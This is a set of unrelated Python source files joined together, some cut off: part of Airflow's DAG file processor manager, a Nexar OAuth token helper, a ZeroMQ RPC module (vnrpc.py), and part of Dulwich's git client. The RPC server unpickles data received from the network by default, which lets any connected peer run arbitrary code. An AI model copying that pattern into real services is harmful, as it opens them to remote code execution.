for file_path, pid, runtime, num_dags, num_errors, last_runtime, last_run in rows:
formatted_rows.append(
(
file_path,
pid,
f"{runtime.total_seconds():.2f}s" if runtime else None,
num_dags,
num_errors,
f"{last_runtime:.2f}s" if last_runtime else None,
last_run.strftime("%Y-%m-%dT%H:%M:%S") if last_run else None,
)
)
log_str = (
"\n"
+ "=" * 80
+ "\n"
+ "DAG File Processing Stats\n\n"
+ tabulate(formatted_rows, headers=headers)
+ "\n"
+ "=" * 80
)
self.log.info(log_str)
def get_pid(self, file_path):
"""
:param file_path: the path to the file that's being processed
:return: the PID of the process processing the given file or None if
the specified file is not being processed
:rtype: int
"""
if file_path in self._processors:
return self._processors[file_path].pid
return None
def get_all_pids(self):
"""
:return: a list of the PIDs for the processors that are running
:rtype: List[int]
"""
return [x.pid for x in self._processors.values()]
def get_last_runtime(self, file_path):
"""
:param file_path: the path to the file that was processed
:return: the runtime (in seconds) of the process of the last run, or
None if the file was never processed.
:rtype: float
"""
stat = self._file_stats.get(file_path)
return stat.last_duration if stat else None
def get_last_dag_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:return: the number of dags loaded from that file, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.num_dags if stat else None
def get_last_error_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:return: the number of import errors from processing, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.import_errors if stat else None
def get_last_finish_time(self, file_path):
"""
:param file_path: the path to the file that was processed
:return: the finish time of the process of the last run, or None if the
file was never processed.
:rtype: datetime
"""
stat = self._file_stats.get(file_path)
return stat.last_finish_time if stat else None
def get_start_time(self, file_path):
"""
:param file_path: the path to the file that's being processed
:return: the start time of the process that's processing the
specified file or None if the file is not currently being processed
:rtype: datetime
"""
if file_path in self._processors:
return self._processors[file_path].start_time
return None
def get_run_count(self, file_path):
"""
:param file_path: the path to the file that's being processed
:return: the number of times the given file has been parsed
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.run_count if stat else 0
def set_file_paths(self, new_file_paths):
"""
Update this with a new set of paths to DAG definition files.
:param new_file_paths: list of paths to DAG definition files
:return: None
"""
self._file_paths = new_file_paths
self._file_path_queue = [x for x in self._file_path_queue if x in new_file_paths]
# Stop processors that are working on deleted files
filtered_processors = {}
for file_path, processor in self._processors.items():
if file_path in new_file_paths:
filtered_processors[file_path] = processor
else:
self.log.warning("Stopping processor for %s", file_path)
Stats.decr('dag_processing.processes')
processor.terminate()
self._file_stats.pop(file_path)
self._processors = filtered_processors
def wait_until_finished(self):
"""Sleeps until all the processors are done."""
for processor in self._processors.values():
while not processor.done:
time.sleep(0.1)
def _collect_results_from_processor(self, processor) -> None:
self.log.debug("Processor for %s finished", processor.file_path)
Stats.decr('dag_processing.processes')
last_finish_time = timezone.utcnow()
if processor.result is not None:
num_dags, count_import_errors = processor.result
else:
self.log.error(
"Processor for %s exited with return code %s.", processor.file_path, processor.exit_code
)
count_import_errors = -1
num_dags = 0
last_duration = (last_finish_time - processor.start_time).total_seconds()
stat = DagFileStat(
num_dags=num_dags,
import_errors=count_import_errors,
last_finish_time=last_finish_time,
last_duration=last_duration,
run_count=self.get_run_count(processor.file_path) + 1,
)
self._file_stats[processor.file_path] = stat
file_name = os.path.splitext(os.path.basename(processor.file_path))[0].replace(os.sep, '.')
Stats.timing(f'dag_processing.last_duration.{file_name}', last_duration)
def collect_results(self) -> None:
"""Collect the result from any finished DAG processors"""
ready = multiprocessing.connection.wait(self.waitables.keys() - [self._signal_conn], timeout=0)
for sentinel in ready:
if sentinel is self._signal_conn:
continue
processor = cast(DagFileProcessorProcess, self.waitables[sentinel])
self.waitables.pop(processor.waitable_handle)
self._processors.pop(processor.file_path)
self._collect_results_from_processor(processor)
self.log.debug("%s/%s DAG parsing processes running", len(self._processors), self._parallelism)
self.log.debug("%s file paths queued for processing", len(self._file_path_queue))
@staticmethod
def _create_process(file_path, pickle_dags, dag_ids, callback_requests):
"""Creates DagFileProcessorProcess instance."""
return DagFileProcessorProcess(
file_path=file_path, pickle_dags=pickle_dags, dag_ids=dag_ids, callback_requests=callback_requests
)
def start_new_processes(self):
"""Start more processors if we have enough slots and files to process"""
while self._parallelism - len(self._processors) > 0 and self._file_path_queue:
file_path = self._file_path_queue.pop(0)
# Stop creating duplicate processor i.e. processor with the same filepath
if file_path in self._processors.keys():
continue
callback_to_execute_for_file = self._callback_to_execute[file_path]
processor = self._create_process(
file_path, self._pickle_dags, self._dag_ids, callback_to_execute_for_file
)
del self._callback_to_execute[file_path]
Stats.incr('dag_processing.processes')
processor.start()
self.log.debug("Started a process (PID: %s) to generate tasks for %s", processor.pid, file_path)
self._processors[file_path] = processor
self.waitables[processor.waitable_handle] = processor
def prepare_file_path_queue(self):
"""Generate more file paths to process. Result are saved in _file_path_queue."""
self._parsing_start_time = time.perf_counter()
# If the file path is already being processed, or if a file was
# processed recently, wait until the next batch
file_paths_in_progress = self._processors.keys()
now = timezone.utcnow()
# Sort the file paths by the parsing order mode
list_mode = conf.get("scheduler", "file_parsing_sort_mode")
files_with_mtime = {}
file_paths = []
is_mtime_mode = list_mode == "modified_time"
file_paths_recently_processed = []
for file_path in self._file_paths:
if is_mtime_mode:
try:
files_with_mtime[file_path] = os.path.getmtime(file_path)
except FileNotFoundError:
self.log.warning("Skipping processing of missing file: %s", file_path)
continue
file_modified_time = timezone.make_aware(datetime.fromtimestamp(files_with_mtime[file_path]))
else:
file_paths.append(file_path)
file_modified_time = None
# Find file paths that were recently processed to exclude them
# from being added to file_path_queue
# unless they were modified recently and parsing mode is "modified_time"
# in which case we don't honor "self._file_process_interval" (min_file_process_interval)
last_finish_time = self.get_last_finish_time(file_path)
if (
last_finish_time is not None
and (now - last_finish_time).total_seconds() < self._file_process_interval
and not (is_mtime_mode and file_modified_time and (file_modified_time > last_finish_time))
):
file_paths_recently_processed.append(file_path)
# Sort file paths via last modified time
if is_mtime_mode:
file_paths = sorted(files_with_mtime, key=files_with_mtime.get, reverse=True)
elif list_mode == "alphabetical":
file_paths = sorted(file_paths)
elif list_mode == "random_seeded_by_host":
# Shuffle the list seeded by hostname so multiple schedulers can work on different
# set of files. Since we set the seed, the sort order will remain same per host
random.Random(get_hostname()).shuffle(file_paths)
files_paths_at_run_limit = [
file_path for file_path, stat in self._file_stats.items() if stat.run_count == self._max_runs
]
file_paths_to_exclude = set(file_paths_in_progress).union(
file_paths_recently_processed, files_paths_at_run_limit
)
# Do not convert the following list to set as set does not preserve the order
# and we need to maintain the order of file_paths for `[scheduler] file_parsing_sort_mode`
files_paths_to_queue = [
file_path for file_path in file_paths if file_path not in file_paths_to_exclude
]
for file_path, processor in self._processors.items():
self.log.debug(
"File path %s is still being processed (started: %s)",
processor.file_path,
processor.start_time.isoformat(),
)
self.log.debug("Queuing the following files for processing:\n\t%s", "\n\t".join(files_paths_to_queue))
for file_path in files_paths_to_queue:
if file_path not in self._file_stats:
self._file_stats[file_path] = DagFileStat(
num_dags=0, import_errors=0, last_finish_time=None, last_duration=None, run_count=0
)
self._file_path_queue.extend(files_paths_to_queue)
def _kill_timed_out_processors(self):
"""Kill any file processors that timeout to defend against process hangs."""
now = timezone.utcnow()
for file_path, processor in self._processors.items():
duration = now - processor.start_time
if duration > self._processor_timeout:
self.log.error(
"Processor for %s with PID %s started at %s has timed out, killing it.",
file_path,
processor.pid,
processor.start_time.isoformat(),
)
Stats.decr('dag_processing.processes')
Stats.incr('dag_processing.processor_timeouts')
# TODO: Remove after Airflow 2.0
Stats.incr('dag_file_processor_timeouts')
processor.kill()
def max_runs_reached(self):
""":return: whether all file paths have been processed max_runs times"""
if self._max_runs == -1: # Unlimited runs.
return False
for stat in self._file_stats.values():
if stat.run_count < self._max_runs:
return False
if self._num_run < self._max_runs:
return False
return True
def terminate(self):
"""
Stops all running processors
:return: None
"""
for processor in self._processors.values():
Stats.decr('dag_processing.processes')
processor.terminate()
def end(self):
"""
Kill all child processes on exit since we don't want to leave
them as orphaned.
"""
pids_to_kill = self.get_all_pids()
if pids_to_kill:
kill_child_processes_by_pids(pids_to_kill)
def emit_metrics(self):
"""
Emit metrics about dag parsing summary
This is called once every time around the parsing "loop" - i.e. after
all files have been parsed.
"""
parse_time = time.perf_counter() - self._parsing_start_time
Stats.gauge('dag_processing.total_parse_time', parse_time)
Stats.gauge('dagbag_size', sum(stat.num_dags for stat in self._file_stats.values()))
Stats.gauge(
'dag_processing.import_errors', sum(stat.import_errors for stat in self._file_stats.values())
)
@property
def file_paths(self):
return self._file_paths
|
nexar_token.py
|
"""Main entry point to the service."""
import base64
import hashlib
import os
import re
import webbrowser
from multiprocessing import Process
from urllib.parse import parse_qs, urlparse
import requests
from oauthlib.oauth2 import BackendApplicationClient
from oauthlib.oauth2.rfc6749.errors import MissingTokenError
from requests_oauthlib import OAuth2Session
from local_service import main
PROD_TOKEN_URL = "https://identity.nexar.com/connect/token"
REDIRECT_URI = "http://localhost:3000/login"
AUTHORITY_URL = "https://identity.nexar.com/connect/authorize"
def get_token(client_id, client_secret):
"""Return the Nexar token from the client_id and client_secret provided."""
if not client_id or not client_secret:
raise Exception("client_id and/or client_secret are empty")
client = BackendApplicationClient(client_id=client_id)
oauth = OAuth2Session(client=client)
token = {}
try:
token = oauth.fetch_token(
token_url=PROD_TOKEN_URL,
client_id=client_id,
client_secret=client_secret,
include_client_id=True,
)
except MissingTokenError:
raise
return token
def get_token_with_login(client_id, client_secret, scope):
"""Open the Nexar authorization url from the client_id and scope provided."""
if not client_id or not client_secret:
raise Exception("client_id and/or client_secret are empty")
if not scope:
raise Exception("scope is empty")
token = {}
scope_list = ["openid", "profile", "email"] + scope
# Start the local service
server = Process(target=main)
server.daemon = True
server.start()
# PCKE code verifier and challenge
code_verifier = base64.urlsafe_b64encode(os.urandom(40)).decode("utf-8")
code_verifier = re.sub("[^a-zA-Z0-9]+", "", code_verifier)
code_challenge = hashlib.sha256(code_verifier.encode("utf-8")).digest()
code_challenge = base64.urlsafe_b64encode(code_challenge).decode("utf-8")
code_challenge = code_challenge.replace("=", "")
try:
# Request login page
oauth = OAuth2Session(client_id, redirect_uri=REDIRECT_URI, scope=scope_list)
authorization_url, _ = oauth.authorization_url(
url=AUTHORITY_URL,
code_challenge=code_challenge,
code_challenge_method="S256",
)
authorization_url = authorization_url.replace("+", "%20")
# Obtain redirect response
webbrowser.open_new(authorization_url)
redirect_response = input(
"\nPlease authorize access and enter the redirect URL: "
).strip()
# Terminate the local service because no longer needed
server.terminate()
redirect_params = parse_qs(urlparse(redirect_response).query)
auth_code = redirect_params["code"][0]
token = requests.post(
url=PROD_TOKEN_URL,
data={
"grant_type": "authorization_code",
"client_id": client_id,
"client_secret": client_secret,
"redirect_uri": REDIRECT_URI,
"code": auth_code,
"code_verifier": code_verifier,
},
allow_redirects=False,
).json()
except Exception:
raise
return token
|
vnrpc.py
|
# encoding: UTF-8
import threading
import traceback
import signal
import zmq
from msgpack import packb, unpackb
from json import dumps, loads
try:
import cPickle
pDumps = cPickle.dumps
pLoads = cPickle.loads
except ImportError:
# for python 3
import pickle
pDumps = pickle.dumps
pLoads = pickle.loads
# 实现Ctrl-c中断recv
signal.signal(signal.SIGINT, signal.SIG_DFL)
########################################################################
class RpcObject(object):
"""
RPC对象
提供对数据的序列化打包和解包接口,目前提供了json、msgpack、cPickle三种工具。
msgpack:性能更高,但通常需要安装msgpack相关工具;
json:性能略低但通用性更好,大部分编程语言都内置了相关的库。
cPickle:性能一般且仅能用于Python,但是可以直接传送Python对象,非常方便。
因此建议尽量使用msgpack,如果要和某些语言通讯没有提供msgpack时再使用json,
当传送的数据包含很多自定义的Python对象时建议使用cPickle。
如果希望使用其他的序列化工具也可以在这里添加。
"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
# 默认使用msgpack作为序列化工具
#self.useMsgpack()
self.usePickle()
#----------------------------------------------------------------------
def pack(self, data):
"""打包"""
pass
#----------------------------------------------------------------------
def unpack(self, data):
"""解包"""
pass
#----------------------------------------------------------------------
def __jsonPack(self, data):
"""使用json打包"""
return dumps(data)
#----------------------------------------------------------------------
def __jsonUnpack(self, data):
"""使用json解包"""
return loads(data)
#----------------------------------------------------------------------
def __msgpackPack(self, data):
"""使用msgpack打包"""
return packb(data)
#----------------------------------------------------------------------
def __msgpackUnpack(self, data):
"""使用msgpack解包"""
return unpackb(data)
#----------------------------------------------------------------------
def __picklePack(self, data):
"""使用cPickle打包"""
try:
return pDumps(data)
except:
data[1] = list(data[1])
return pDumps(data)
#----------------------------------------------------------------------
def __pickleUnpack(self, data):
"""使用cPickle解包"""
return pLoads(data)
#----------------------------------------------------------------------
def useJson(self):
"""使用json作为序列化工具"""
self.pack = self.__jsonPack
self.unpack = self.__jsonUnpack
#----------------------------------------------------------------------
def useMsgpack(self):
"""使用msgpack作为序列化工具"""
self.pack = self.__msgpackPack
self.unpack = self.__msgpackUnpack
#----------------------------------------------------------------------
def usePickle(self):
"""使用cPickle作为序列化工具"""
self.pack = self.__picklePack
self.unpack = self.__pickleUnpack
########################################################################
class RpcServer(RpcObject):
"""RPC服务器"""
#----------------------------------------------------------------------
def __init__(self, repAddress, pubAddress):
"""Constructor"""
super(RpcServer, self).__init__()
# 保存功能函数的字典,key是函数名,value是函数对象
self.__functions = {}
# zmq端口相关
self.__context = zmq.Context()
self.__socketREP = self.__context.socket(zmq.REP) # 请求回应socket
self.__socketREP.bind(repAddress)
self.__socketPUB = self.__context.socket(zmq.PUB) # 数据广播socket
self.__socketPUB.bind(pubAddress)
# 工作线程相关
self.__active = False # 服务器的工作状态
self.__thread = threading.Thread(target=self.run) # 服务器的工作线程
#----------------------------------------------------------------------
def start(self):
"""启动服务器"""
# 将服务器设为启动
self.__active = True
# 启动工作线程
if not self.__thread.isAlive():
self.__thread.start()
#----------------------------------------------------------------------
def stop(self, join=False):
"""停止服务器"""
# 将服务器设为停止
self.__active = False
# 等待工作线程退出
if join and self.__thread.isAlive():
self.__thread.join()
#----------------------------------------------------------------------
def run(self):
"""服务器运行函数"""
while self.__active:
# 使用poll来等待事件到达,等待1秒(1000毫秒)
if not self.__socketREP.poll(1000):
continue
# 从请求响应socket收取请求数据
reqb = self.__socketREP.recv()
# 序列化解包
req = self.unpack(reqb)
# 获取函数名和参数
name, args, kwargs = req
# 获取引擎中对应的函数对象,并执行调用,如果有异常则捕捉后返回
try:
func = self.__functions[name]
r = func(*args, **kwargs)
rep = [True, r]
except Exception as e:
rep = [False, traceback.format_exc()]
# 序列化打包
repb = self.pack(rep)
# 通过请求响应socket返回调用结果
self.__socketREP.send(repb)
#----------------------------------------------------------------------
def publish(self, topic, data):
"""
广播推送数据
topic:主题内容(注意必须是ascii编码)
data:具体的数据
"""
# 序列化数据
datab = self.pack(data)
# 通过广播socket发送数据
self.__socketPUB.send_multipart([topic, datab])
#----------------------------------------------------------------------
def register(self, func):
"""注册函数"""
self.__functions[func.__name__] = func
########################################################################
class RpcClient(RpcObject):
"""RPC客户端"""
#----------------------------------------------------------------------
def __init__(self, reqAddress, subAddress):
"""Constructor"""
super(RpcClient, self).__init__()
# zmq端口相关
self.__reqAddress = reqAddress
self.__subAddress = subAddress
self.__context = zmq.Context()
self.__socketREQ = self.__context.socket(zmq.REQ) # 请求发出socket
self.__socketSUB = self.__context.socket(zmq.SUB) # 广播订阅socket
# 工作线程相关,用于处理服务器推送的数据
self.__active = False # 客户端的工作状态
self.__thread = threading.Thread(target=self.run) # 客户端的工作线程
#----------------------------------------------------------------------
def __getattr__(self, name):
"""实现远程调用功能"""
# 执行远程调用任务
def dorpc(*args, **kwargs):
# 生成请求
req = [name, args, kwargs]
# 序列化打包请求
reqb = self.pack(req)
# 发送请求并等待回应
self.__socketREQ.send(reqb)
repb = self.__socketREQ.recv()
# 序列化解包回应
rep = self.unpack(repb)
# 若正常则返回结果,调用失败则触发异常
if rep[0]:
return rep[1]
else:
raise RemoteException(rep[1])
return dorpc
#----------------------------------------------------------------------
def start(self):
"""启动客户端"""
# 连接端口
self.__socketREQ.connect(self.__reqAddress)
self.__socketSUB.connect(self.__subAddress)
# 将服务器设为启动
self.__active = True
# 启动工作线程
if not self.__thread.isAlive():
self.__thread.start()
#----------------------------------------------------------------------
def stop(self):
"""停止客户端"""
# 将客户端设为停止
self.__active = False
# 等待工作线程退出
if self.__thread.isAlive():
self.__thread.join()
#----------------------------------------------------------------------
def run(self):
"""客户端运行函数"""
while self.__active:
# 使用poll来等待事件到达,等待1秒(1000毫秒)
if not self.__socketSUB.poll(1000):
continue
# 从订阅socket收取广播数据
topic, datab = self.__socketSUB.recv_multipart()
# 序列化解包
data = self.unpack(datab)
# 调用回调函数处理
self.callback(topic, data)
#----------------------------------------------------------------------
def callback(self, topic, data):
"""回调函数,必须由用户实现"""
raise NotImplementedError
#----------------------------------------------------------------------
def subscribeTopic(self, topic):
"""
订阅特定主题的广播数据
可以使用topic=''来订阅所有的主题
注意topic必须是ascii编码
"""
self.__socketSUB.setsockopt(zmq.SUBSCRIBE, topic)
########################################################################
class RemoteException(Exception):
"""RPC远程异常"""
#----------------------------------------------------------------------
def __init__(self, value):
"""Constructor"""
self.__value = value
#----------------------------------------------------------------------
def __str__(self):
"""输出错误信息"""
return self.__value
|
client.py
|
# client.py -- Implementation of the server side git protocols
# Copyright (C) 2008-2013 Jelmer Vernooij <jelmer@samba.org>
# Copyright (C) 2008 John Carr
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# or (at your option) a later version of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
"""Client side support for the Git protocol.
The Dulwich client supports the following capabilities:
* thin-pack
* multi_ack_detailed
* multi_ack
* side-band-64k
* ofs-delta
* report-status
* delete-refs
Known capabilities that are not supported:
* shallow
* no-progress
* include-tag
"""
__docformat__ = 'restructuredText'
from io import BytesIO
import dulwich
import select
import socket
import subprocess
import urllib2
import urlparse
from dulwich.errors import (
GitProtocolError,
NotGitRepository,
SendPackError,
UpdateRefsError,
)
from dulwich.protocol import (
_RBUFSIZE,
PktLineParser,
Protocol,
ProtocolFile,
TCP_GIT_PORT,
ZERO_SHA,
extract_capabilities,
)
from dulwich.pack import (
write_pack_objects,
)
from dulwich.refs import (
read_info_refs,
)
def _fileno_can_read(fileno):
"""Check if a file descriptor is readable."""
return len(select.select([fileno], [], [], 0)[0]) > 0
COMMON_CAPABILITIES = ['ofs-delta', 'side-band-64k']
FETCH_CAPABILITIES = (['thin-pack', 'multi_ack', 'multi_ack_detailed'] +
COMMON_CAPABILITIES)
SEND_CAPABILITIES = ['report-status'] + COMMON_CAPABILITIES
class ReportStatusParser(object):
"""Handle status as reported by servers with 'report-status' capability.
"""
def __init__(self):
self._done = False
self._pack_status = None
self._ref_status_ok = True
self._ref_statuses = []
def check(self):
"""Check if there were any errors and, if so, raise exceptions.
:raise SendPackError: Raised when the server could not unpack
:raise UpdateRefsError: Raised when refs could not be updated
"""
if self._pack_status not in ('unpack ok', None):
raise SendPackError(self._pack_status)
if not self._ref_status_ok:
ref_status = {}
ok = set()
for status in self._ref_statuses:
if ' ' not in status:
# malformed response, move on to the next one
continue
status, ref = status.split(' ', 1)
if status == 'ng':
if ' ' in ref:
ref, status = ref.split(' ', 1)
else:
ok.add(ref)
ref_status[ref] = status
raise UpdateRefsError('%s failed to update' %
', '.join([ref for ref in ref_status
if ref not in ok]),
ref_status=ref_status)
def handle_packet(self, pkt):
"""Handle a packet.
:raise GitProtocolError: Raised when packets are received after a
flush packet.
"""
if self._done:
raise GitProtocolError("received more data after status report")
if pkt is None:
self._done = True
return
if self._pack_status is None:
self._pack_status = pkt.strip()
else:
ref_status = pkt.strip()
self._ref_statuses.append(ref_status)
if not ref_status.startswith('ok '):
self._ref_status_ok = False
def read_pkt_refs(proto):
server_capabilities = None
refs = {}
# Receive refs from server
for pkt in proto.read_pkt_seq():
(sha, ref) = pkt.rstrip('\n').split(None, 1)
if sha == 'ERR':
raise GitProtocolError(ref)
if server_capabilities is None:
(ref, server_capabilities) = extract_capabilities(ref)
refs[ref] = sha
if len(refs) == 0:
return None, set([])
return refs, set(server_capabilities)
# TODO(durin42): this doesn't correctly degrade if the server doesn't
# support some capabilities. This should work properly with servers
# that don't support multi_ack.
class GitClient(object):
"""Git smart server client.
"""
def __init__(self, thin_packs=True, report_activity=None):
"""Create a new GitClient instance.
:param thin_packs: Whether or not thin packs should be retrieved
:param report_activity: Optional callback for reporting transport
activity.
"""
self._report_activity = report_activity
self._report_status_parser = None
self._fetch_capabilities = set(FETCH_CAPABILITIES)
self._send_capabilities = set(SEND_CAPABILITIES)
if not thin_packs:
self._fetch_capabilities.remove('thin-pack')
def send_pack(self, path, determine_wants, generate_pack_contents,
progress=None):
"""Upload a pack to a remote repository.
:param path: Repository path
:param generate_pack_contents: Function that can return a sequence of
the shas of the objects to upload.
:param progress: Optional progress function
:raises SendPackError: if server rejects the pack data
:raises UpdateRefsError: if the server supports report-status
and rejects ref updates
"""
raise NotImplementedError(self.send_pack)
def fetch(self, path, target, determine_wants=None, progress=None):
"""Fetch into a target repository.
:param path: Path to fetch from
:param target: Target repository to fetch into
:param determine_wants: Optional function to determine what refs
to fetch
:param progress: Optional progress function
:return: remote refs as dictionary
"""
if determine_wants is None:
determine_wants = target.object_store.determine_wants_all
f, commit, abort = target.object_store.add_pack()
try:
result = self.fetch_pack(
path, determine_wants, target.get_graph_walker(), f.write,
progress)
except:
abort()
raise
else:
commit()
return result
def fetch_pack(self, path, determine_wants, graph_walker, pack_data,
progress=None):
"""Retrieve a pack from a git smart server.
:param determine_wants: Callback that returns list of commits to fetch
:param graph_walker: Object with next() and ack().
:param pack_data: Callback called for each bit of data in the pack
:param progress: Callback for progress reports (strings)
"""
raise NotImplementedError(self.fetch_pack)
def _parse_status_report(self, proto):
unpack = proto.read_pkt_line().strip()
if unpack != 'unpack ok':
st = True
# flush remaining error data
while st is not None:
st = proto.read_pkt_line()
raise SendPackError(unpack)
statuses = []
errs = False
ref_status = proto.read_pkt_line()
while ref_status:
ref_status = ref_status.strip()
statuses.append(ref_status)
if not ref_status.startswith('ok '):
errs = True
ref_status = proto.read_pkt_line()
if errs:
ref_status = {}
ok = set()
for status in statuses:
if ' ' not in status:
# malformed response, move on to the next one
continue
status, ref = status.split(' ', 1)
if status == 'ng':
if ' ' in ref:
ref, status = ref.split(' ', 1)
else:
ok.add(ref)
ref_status[ref] = status
raise UpdateRefsError('%s failed to update' %
', '.join([ref for ref in ref_status
if ref not in ok]),
ref_status=ref_status)
def _read_side_band64k_data(self, proto, channel_callbacks):
"""Read per-channel data.
This requires the side-band-64k capability.
:param proto: Protocol object to read from
:param channel_callbacks: Dictionary mapping channels to packet
handlers to use. None for a callback discards channel data.
"""
for pkt in proto.read_pkt_seq():
channel = ord(pkt[0])
pkt = pkt[1:]
try:
cb = channel_callbacks[channel]
except KeyError:
raise AssertionError('Invalid sideband channel %d' % channel)
else:
if cb is not None:
cb(pkt)
def _handle_receive_pack_head(self, proto, capabilities, old_refs,
new_refs):
"""Handle the head of a 'git-receive-pack' request.
:param proto: Protocol object to read from
:param capabilities: List of negotiated capabilities
:param old_refs: Old refs, as received from the server
:param new_refs: New refs
:return: (have, want) tuple
"""
want = []
have = [x for x in old_refs.values() if not x == ZERO_SHA]
sent_capabilities = False
for refname in set(new_refs.keys() + old_refs.keys()):
old_sha1 = old_refs.get(refname, ZERO_SHA)
new_sha1 = new_refs.get(refname, ZERO_SHA)
if old_sha1 != new_sha1:
if sent_capabilities:
proto.write_pkt_line('%s %s %s' % (
old_sha1, new_sha1, refname))
else:
proto.write_pkt_line(
'%s %s %s\0%s' % (old_sha1, new_sha1, refname,
' '.join(capabilities)))
sent_capabilities = True
if new_sha1 not in have and new_sha1 != ZERO_SHA:
want.append(new_sha1)
proto.write_pkt_line(None)
return (have, want)
def _handle_receive_pack_tail(self, proto, capabilities, progress=None):
"""Handle the tail of a 'git-receive-pack' request.
:param proto: Protocol object to read from
:param capabilities: List of negotiated capabilities
:param progress: Optional progress reporting function
"""
if "side-band-64k" in capabilities:
if progress is None:
progress = lambda x: None
channel_callbacks = {2: progress}
if 'report-status' in capabilities:
channel_callbacks[1] = PktLineParser(
self._report_status_parser.handle_packet).parse
self._read_side_band64k_data(proto, channel_callbacks)
else:
if 'report-status' in capabilities:
for pkt in proto.read_pkt_seq():
self._report_status_parser.handle_packet(pkt)
if self._report_status_parser is not None:
self._report_status_parser.check()
def _handle_upload_pack_head(self, proto, capabilities, graph_walker,
wants, can_read):
"""Handle the head of a 'git-upload-pack' request.
:param proto: Protocol object to read from
:param capabilities: List of negotiated capabilities
:param graph_walker: GraphWalker instance to call .ack() on
:param wants: List of commits to fetch
:param can_read: function that returns a boolean that indicates
whether there is extra graph data to read on proto
"""
assert isinstance(wants, list) and isinstance(wants[0], str)
proto.write_pkt_line('want %s %s\n' % (
wants[0], ' '.join(capabilities)))
for want in wants[1:]:
proto.write_pkt_line('want %s\n' % want)
proto.write_pkt_line(None)
have = next(graph_walker)
while have:
proto.write_pkt_line('have %s\n' % have)
if can_read():
pkt = proto.read_pkt_line()
parts = pkt.rstrip('\n').split(' ')
if parts[0] == 'ACK':
graph_walker.ack(parts[1])
if parts[2] in ('continue', 'common'):
pass
elif parts[2] == 'ready':
break
else:
raise AssertionError(
"%s not in ('continue', 'ready', 'common)" %
parts[2])
have = next(graph_walker)
proto.write_pkt_line('done\n')
def _handle_upload_pack_tail(self, proto, capabilities, graph_walker,
pack_data, progress=None, rbufsize=_RBUFSIZE):
"""Handle the tail of a 'git-upload-pack' request.
:param proto: Protocol object to read from
:param capabilities: List of negotiated capabilities
:param graph_walker: GraphWalker instance to call .ack() on
:param pack_data: Function to call with pack data
:param progress: Optional progress reporting function
:param rbufsize: Read buffer size
"""
pkt = proto.read_pkt_line()
while pkt:
parts = pkt.rstrip('\n').split(' ')
if parts[0] == 'ACK':
graph_walker.ack(pkt.split(' ')[1])
if len(parts) < 3 or parts[2] not in (
'ready', 'continue', 'common'):
break
pkt = proto.read_pkt_line()
if "side-band-64k" in capabilities:
if progress is None:
# Just ignore progress data
progress = lambda x: None
self._read_side_band64k_data(proto, {1: pack_data, 2: progress})
else:
while True:
data = proto.read(rbufsize)
if data == "":
break
pack_data(data)
class TraditionalGitClient(GitClient):
"""Traditional Git client."""
def _connect(self, cmd, path):
"""Create a connection to the server.
This method is abstract - concrete implementations should
implement their own variant which connects to the server and
returns an initialized Protocol object with the service ready
for use and a can_read function which may be used to see if
reads would block.
:param cmd: The git service name to which we should connect.
:param path: The path we should pass to the service.
"""
raise NotImplementedError()
def send_pack(self, path, determine_wants, generate_pack_contents,
progress=None):
"""Upload a pack to a remote repository.
:param path: Repository path
:param generate_pack_contents: Function that can return a sequence of
the shas of the objects to upload.
:param progress: Optional callback called with progress updates
:raises SendPackError: if server rejects the pack data
:raises UpdateRefsError: if the server supports report-status
and rejects ref updates
"""
proto, unused_can_read = self._connect('receive-pack', path)
with proto:
old_refs, server_capabilities = read_pkt_refs(proto)
negotiated_capabilities = self._send_capabilities & server_capabilities
if 'report-status' in negotiated_capabilities:
self._report_status_parser = ReportStatusParser()
report_status_parser = self._report_status_parser
try:
new_refs = orig_new_refs = determine_wants(dict(old_refs))
except:
proto.write_pkt_line(None)
raise
if not 'delete-refs' in server_capabilities:
# Server does not support deletions. Fail later.
def remove_del(pair):
if pair[1] == ZERO_SHA:
if 'report-status' in negotiated_capabilities:
report_status_parser._ref_statuses.append(
'ng %s remote does not support deleting refs'
% pair[1])
report_status_parser._ref_status_ok = False
return False
else:
return True
new_refs = dict(
filter(
remove_del,
[(ref, sha) for ref, sha in new_refs.iteritems()]))
if new_refs is None:
proto.write_pkt_line(None)
return old_refs
if len(new_refs) == 0 and len(orig_new_refs):
# NOOP - Original new refs filtered out by policy
proto.write_pkt_line(None)
if self._report_status_parser is not None:
self._report_status_parser.check()
return old_refs
(have, want) = self._handle_receive_pack_head(
proto, negotiated_capabilities, old_refs, new_refs)
if not want and old_refs == new_refs:
return new_refs
objects = generate_pack_contents(have, want)
if len(objects) > 0:
entries, sha = write_pack_objects(proto.write_file(), objects)
elif len(set(new_refs.values()) - set([ZERO_SHA])) > 0:
# Check for valid create/update refs
filtered_new_refs = \
dict([(ref, sha) for ref, sha in new_refs.iteritems()
if sha != ZERO_SHA])
if len(set(filtered_new_refs.iteritems()) -
set(old_refs.iteritems())) > 0:
entries, sha = write_pack_objects(proto.write_file(), objects)
self._handle_receive_pack_tail(
proto, negotiated_capabilities, progress)
return new_refs
def fetch_pack(self, path, determine_wants, graph_walker, pack_data,
progress=None):
"""Retrieve a pack from a git smart server.
:param determine_wants: Callback that returns list of commits to fetch
:param graph_walker: Object with next() and ack().
:param pack_data: Callback called for each bit of data in the pack
:param progress: Callback for progress reports (strings)
"""
proto, can_read = self._connect('upload-pack', path)
with proto:
refs, server_capabilities = read_pkt_refs(proto)
negotiated_capabilities = (
self._fetch_capabilities & server_capabilities)
if refs is None:
proto.write_pkt_line(None)
return refs
try:
wants = determine_wants(refs)
except:
proto.write_pkt_line(None)
raise
if wants is not None:
wants = [cid for cid in wants if cid != ZERO_SHA]
if not wants:
proto.write_pkt_line(None)
return refs
self._handle_upload_pack_head(
proto, negotiated_capabilities, graph_walker, wants, can_read)
self._handle_upload_pack_tail(
